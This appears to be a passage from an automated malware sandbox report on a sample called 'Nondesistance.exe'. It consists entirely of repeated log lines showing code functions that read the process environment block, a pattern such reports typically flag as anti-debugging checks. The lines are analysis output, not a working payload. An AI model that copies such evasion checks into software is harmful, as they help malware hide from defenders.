        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E363 mov eax, dword ptr fs:[00000030h]9_2_3252E363
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250E310 mov eax, dword ptr fs:[00000030h]9_2_3250E310
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250E310 mov eax, dword ptr fs:[00000030h]9_2_3250E310
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250E310 mov eax, dword ptr fs:[00000030h]9_2_3250E310
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E9303 mov eax, dword ptr fs:[00000030h]9_2_324E9303
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E9303 mov eax, dword ptr fs:[00000030h]9_2_324E9303
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252631F mov eax, dword ptr fs:[00000030h]9_2_3252631F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF30A mov eax, dword ptr fs:[00000030h]9_2_325AF30A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257330C mov eax, dword ptr fs:[00000030h]9_2_3257330C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257330C mov eax, dword ptr fs:[00000030h]9_2_3257330C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257330C mov eax, dword ptr fs:[00000030h]9_2_3257330C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257330C mov eax, dword ptr fs:[00000030h]9_2_3257330C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EE328 mov eax, dword ptr fs:[00000030h]9_2_324EE328
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EE328 mov eax, dword ptr fs:[00000030h]9_2_324EE328
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EE328 mov eax, dword ptr fs:[00000030h]9_2_324EE328
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C3336 mov eax, dword ptr fs:[00000030h]9_2_325C3336
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32528322 mov eax, dword ptr fs:[00000030h]9_2_32528322
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32528322 mov eax, dword ptr fs:[00000030h]9_2_32528322
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32528322 mov eax, dword ptr fs:[00000030h]9_2_32528322
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251332D mov eax, dword ptr fs:[00000030h]9_2_3251332D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325233D0 mov eax, dword ptr fs:[00000030h]9_2_325233D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325743D5 mov eax, dword ptr fs:[00000030h]9_2_325743D5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325243D0 mov ecx, dword ptr fs:[00000030h]9_2_325243D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F63CB mov eax, dword ptr fs:[00000030h]9_2_324F63CB
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EC3C7 mov eax, dword ptr fs:[00000030h]9_2_324EC3C7
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EE3C0 mov eax, dword ptr fs:[00000030h]9_2_324EE3C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EE3C0 mov eax, dword ptr fs:[00000030h]9_2_324EE3C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EE3C0 mov eax, dword ptr fs:[00000030h]9_2_324EE3C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251A390 mov eax, dword ptr fs:[00000030h]9_2_3251A390
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251A390 mov eax, dword ptr fs:[00000030h]9_2_3251A390
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251A390 mov eax, dword ptr fs:[00000030h]9_2_3251A390
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F1380 mov eax, dword ptr fs:[00000030h]9_2_324F1380
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F1380 mov eax, dword ptr fs:[00000030h]9_2_324F1380
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F1380 mov eax, dword ptr fs:[00000030h]9_2_324F1380
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F1380 mov eax, dword ptr fs:[00000030h]9_2_324F1380
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F1380 mov eax, dword ptr fs:[00000030h]9_2_324F1380
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250F380 mov eax, dword ptr fs:[00000030h]9_2_3250F380
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250F380 mov eax, dword ptr fs:[00000030h]9_2_3250F380
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250F380 mov eax, dword ptr fs:[00000030h]9_2_3250F380
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250F380 mov eax, dword ptr fs:[00000030h]9_2_3250F380
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250F380 mov eax, dword ptr fs:[00000030h]9_2_3250F380
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250F380 mov eax, dword ptr fs:[00000030h]9_2_3250F380
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF38A mov eax, dword ptr fs:[00000030h]9_2_325AF38A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256C3B0 mov eax, dword ptr fs:[00000030h]9_2_3256C3B0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F93A6 mov eax, dword ptr fs:[00000030h]9_2_324F93A6
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F93A6 mov eax, dword ptr fs:[00000030h]9_2_324F93A6
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C505B mov eax, dword ptr fs:[00000030h]9_2_325C505B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32520044 mov eax, dword ptr fs:[00000030h]9_2_32520044
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F1051 mov eax, dword ptr fs:[00000030h]9_2_324F1051
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F1051 mov eax, dword ptr fs:[00000030h]9_2_324F1051
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32599060 mov eax, dword ptr fs:[00000030h]9_2_32599060
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F6074 mov eax, dword ptr fs:[00000030h]9_2_324F6074
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F6074 mov eax, dword ptr fs:[00000030h]9_2_324F6074
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F7072 mov eax, dword ptr fs:[00000030h]9_2_324F7072
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F8009 mov eax, dword ptr fs:[00000030h]9_2_324F8009
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32515004 mov eax, dword ptr fs:[00000030h]9_2_32515004
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32515004 mov ecx, dword ptr fs:[00000030h]9_2_32515004
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324ED02D mov eax, dword ptr fs:[00000030h]9_2_324ED02D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250B0D0 mov eax, dword ptr fs:[00000030h]9_2_3250B0D0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB0D6 mov eax, dword ptr fs:[00000030h]9_2_324EB0D6
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB0D6 mov eax, dword ptr fs:[00000030h]9_2_324EB0D6
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB0D6 mov eax, dword ptr fs:[00000030h]9_2_324EB0D6
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB0D6 mov eax, dword ptr fs:[00000030h]9_2_324EB0D6
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252D0F0 mov eax, dword ptr fs:[00000030h]9_2_3252D0F0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252D0F0 mov ecx, dword ptr fs:[00000030h]9_2_3252D0F0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E90F8 mov eax, dword ptr fs:[00000030h]9_2_324E90F8
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E90F8 mov eax, dword ptr fs:[00000030h]9_2_324E90F8
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E90F8 mov eax, dword ptr fs:[00000030h]9_2_324E90F8
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E90F8 mov eax, dword ptr fs:[00000030h]9_2_324E90F8
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EC0F6 mov eax, dword ptr fs:[00000030h]9_2_324EC0F6
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C4080 mov eax, dword ptr fs:[00000030h]9_2_325C4080
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C4080 mov eax, dword ptr fs:[00000030h]9_2_325C4080
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C4080 mov eax, dword ptr fs:[00000030h]9_2_325C4080
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C4080 mov eax, dword ptr fs:[00000030h]9_2_325C4080
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C4080 mov eax, dword ptr fs:[00000030h]9_2_325C4080
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C4080 mov eax, dword ptr fs:[00000030h]9_2_325C4080
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C4080 mov eax, dword ptr fs:[00000030h]9_2_325C4080
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EA093 mov ecx, dword ptr fs:[00000030h]9_2_324EA093
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EC090 mov eax, dword ptr fs:[00000030h]9_2_324EC090
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C50B7 mov eax, dword ptr fs:[00000030h]9_2_325C50B7
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AB0AF mov eax, dword ptr fs:[00000030h]9_2_325AB0AF
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325300A5 mov eax, dword ptr fs:[00000030h]9_2_325300A5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259F0A5 mov eax, dword ptr fs:[00000030h]9_2_3259F0A5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259F0A5 mov eax, dword ptr fs:[00000030h]9_2_3259F0A5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259F0A5 mov eax, dword ptr fs:[00000030h]9_2_3259F0A5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259F0A5 mov eax, dword ptr fs:[00000030h]9_2_3259F0A5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259F0A5 mov eax, dword ptr fs:[00000030h]9_2_3259F0A5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259F0A5 mov eax, dword ptr fs:[00000030h]9_2_3259F0A5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3259F0A5 mov eax, dword ptr fs:[00000030h]9_2_3259F0A5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EA147 mov eax, dword ptr fs:[00000030h]9_2_324EA147
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EA147 mov eax, dword ptr fs:[00000030h]9_2_324EA147
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EA147 mov eax, dword ptr fs:[00000030h]9_2_324EA147
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C3157 mov eax, dword ptr fs:[00000030h]9_2_325C3157
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C3157 mov eax, dword ptr fs:[00000030h]9_2_325C3157
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C3157 mov eax, dword ptr fs:[00000030h]9_2_325C3157
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252415F mov eax, dword ptr fs:[00000030h]9_2_3252415F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3258314A mov eax, dword ptr fs:[00000030h]9_2_3258314A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3258314A mov eax, dword ptr fs:[00000030h]9_2_3258314A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3258314A mov eax, dword ptr fs:[00000030h]9_2_3258314A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3258314A mov eax, dword ptr fs:[00000030h]9_2_3258314A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C5149 mov eax, dword ptr fs:[00000030h]9_2_325C5149
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3254717A mov eax, dword ptr fs:[00000030h]9_2_3254717A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3254717A mov eax, dword ptr fs:[00000030h]9_2_3254717A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F6179 mov eax, dword ptr fs:[00000030h]9_2_324F6179
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252716D mov eax, dword ptr fs:[00000030h]9_2_3252716D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F510D mov eax, dword ptr fs:[00000030h]9_2_324F510D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32520118 mov eax, dword ptr fs:[00000030h]9_2_32520118
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EF113 mov eax, dword ptr fs:[00000030h]9_2_324EF113
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251510F mov eax, dword ptr fs:[00000030h]9_2_3251510F
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF13E mov eax, dword ptr fs:[00000030h]9_2_325AF13E
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3257A130 mov eax, dword ptr fs:[00000030h]9_2_3257A130
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32527128 mov eax, dword ptr fs:[00000030h]9_2_32527128
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32527128 mov eax, dword ptr fs:[00000030h]9_2_32527128
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325001C0 mov eax, dword ptr fs:[00000030h]9_2_325001C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325001C0 mov eax, dword ptr fs:[00000030h]9_2_325001C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325051C0 mov eax, dword ptr fs:[00000030h]9_2_325051C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325051C0 mov eax, dword ptr fs:[00000030h]9_2_325051C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325051C0 mov eax, dword ptr fs:[00000030h]9_2_325051C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325051C0 mov eax, dword ptr fs:[00000030h]9_2_325051C0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325001F1 mov eax, dword ptr fs:[00000030h]9_2_325001F1
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325001F1 mov eax, dword ptr fs:[00000030h]9_2_325001F1
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325001F1 mov eax, dword ptr fs:[00000030h]9_2_325001F1
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251F1F0 mov eax, dword ptr fs:[00000030h]9_2_3251F1F0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251F1F0 mov eax, dword ptr fs:[00000030h]9_2_3251F1F0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E81EB mov eax, dword ptr fs:[00000030h]9_2_324E81EB
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F91E5 mov eax, dword ptr fs:[00000030h]9_2_324F91E5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F91E5 mov eax, dword ptr fs:[00000030h]9_2_324F91E5
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA1E3 mov eax, dword ptr fs:[00000030h]9_2_324FA1E3
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA1E3 mov eax, dword ptr fs:[00000030h]9_2_324FA1E3
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA1E3 mov eax, dword ptr fs:[00000030h]9_2_324FA1E3
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA1E3 mov eax, dword ptr fs:[00000030h]9_2_324FA1E3
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FA1E3 mov eax, dword ptr fs:[00000030h]9_2_324FA1E3
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E0 mov eax, dword ptr fs:[00000030h]9_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E0 mov eax, dword ptr fs:[00000030h]9_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E0 mov eax, dword ptr fs:[00000030h]9_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E0 mov eax, dword ptr fs:[00000030h]9_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E0 mov eax, dword ptr fs:[00000030h]9_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E0 mov eax, dword ptr fs:[00000030h]9_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251B1E0 mov eax, dword ptr fs:[00000030h]9_2_3251B1E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B81EE mov eax, dword ptr fs:[00000030h]9_2_325B81EE
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B81EE mov eax, dword ptr fs:[00000030h]9_2_325B81EE
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E91F0 mov eax, dword ptr fs:[00000030h]9_2_324E91F0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E91F0 mov eax, dword ptr fs:[00000030h]9_2_324E91F0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531190 mov eax, dword ptr fs:[00000030h]9_2_32531190
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531190 mov eax, dword ptr fs:[00000030h]9_2_32531190
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32519194 mov eax, dword ptr fs:[00000030h]9_2_32519194
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F4180 mov eax, dword ptr fs:[00000030h]9_2_324F4180
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F4180 mov eax, dword ptr fs:[00000030h]9_2_324F4180
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F4180 mov eax, dword ptr fs:[00000030h]9_2_324F4180
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325241BB mov ecx, dword ptr fs:[00000030h]9_2_325241BB
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325241BB mov eax, dword ptr fs:[00000030h]9_2_325241BB
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325241BB mov eax, dword ptr fs:[00000030h]9_2_325241BB
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325C51B6 mov eax, dword ptr fs:[00000030h]9_2_325C51B6
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325231BE mov eax, dword ptr fs:[00000030h]9_2_325231BE
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325231BE mov eax, dword ptr fs:[00000030h]9_2_325231BE
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E1A4 mov eax, dword ptr fs:[00000030h]9_2_3252E1A4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252E1A4 mov eax, dword ptr fs:[00000030h]9_2_3252E1A4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324ED64A mov eax, dword ptr fs:[00000030h]9_2_324ED64A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324ED64A mov eax, dword ptr fs:[00000030h]9_2_324ED64A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32525654 mov eax, dword ptr fs:[00000030h]9_2_32525654
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252265C mov eax, dword ptr fs:[00000030h]9_2_3252265C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252265C mov ecx, dword ptr fs:[00000030h]9_2_3252265C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252265C mov eax, dword ptr fs:[00000030h]9_2_3252265C
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F3640 mov eax, dword ptr fs:[00000030h]9_2_324F3640
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250F640 mov eax, dword ptr fs:[00000030h]9_2_3250F640
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250F640 mov eax, dword ptr fs:[00000030h]9_2_3250F640
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3250F640 mov eax, dword ptr fs:[00000030h]9_2_3250F640
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252C640 mov eax, dword ptr fs:[00000030h]9_2_3252C640
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252C640 mov eax, dword ptr fs:[00000030h]9_2_3252C640
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F965A mov eax, dword ptr fs:[00000030h]9_2_324F965A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F965A mov eax, dword ptr fs:[00000030h]9_2_324F965A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532670 mov eax, dword ptr fs:[00000030h]9_2_32532670
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32532670 mov eax, dword ptr fs:[00000030h]9_2_32532670
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E7662 mov eax, dword ptr fs:[00000030h]9_2_324E7662
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E7662 mov eax, dword ptr fs:[00000030h]9_2_324E7662
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324E7662 mov eax, dword ptr fs:[00000030h]9_2_324E7662
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32503660 mov eax, dword ptr fs:[00000030h]9_2_32503660
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32503660 mov eax, dword ptr fs:[00000030h]9_2_32503660
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32503660 mov eax, dword ptr fs:[00000030h]9_2_32503660
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F0670 mov eax, dword ptr fs:[00000030h]9_2_324F0670
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252666D mov esi, dword ptr fs:[00000030h]9_2_3252666D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252666D mov eax, dword ptr fs:[00000030h]9_2_3252666D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252666D mov eax, dword ptr fs:[00000030h]9_2_3252666D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32583608 mov eax, dword ptr fs:[00000030h]9_2_32583608
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32583608 mov eax, dword ptr fs:[00000030h]9_2_32583608
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32583608 mov eax, dword ptr fs:[00000030h]9_2_32583608
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32583608 mov eax, dword ptr fs:[00000030h]9_2_32583608
